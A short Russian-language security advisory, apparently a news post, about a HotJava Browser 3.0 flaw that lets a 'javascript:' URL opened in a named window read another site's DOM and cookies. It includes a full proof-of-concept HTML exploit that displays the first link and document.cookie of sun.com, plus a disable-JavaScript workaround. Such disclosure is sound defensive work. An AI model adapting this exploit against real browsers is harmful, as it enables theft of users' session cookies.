Обнаружена уязвимость в HotJava Browser 3.0, которая дает доступ к DOM программным кодам. Помимо всего прочего, это позволяет воровать cookies других посещенных сайтов.

Системы уязвимы:
HotJava Browser 3.0

Проблема имеет отношение к открытию ' javascript: ' URL в окне, которое позволяет обращаться к DOM документа в этом окне.

Эксплоит:
---------hotjava-1.html------------------------------------------
<SCRIPT>
window.open("http://www.sun.com","g");
setTimeout("window.open('javascript:alert(\"The first link is:
\"+document.links[0].href);alert(\"The cookie is:
\"+document.cookie)','g')",10000);
</SCRIPT>
---------------------------------------------------------------------

Фиксим:
Выруби поддержку JavaScript

Демонстрация:
http://www.guninski.com/hotjava-1.html

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

    • Открыть комментарии
    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии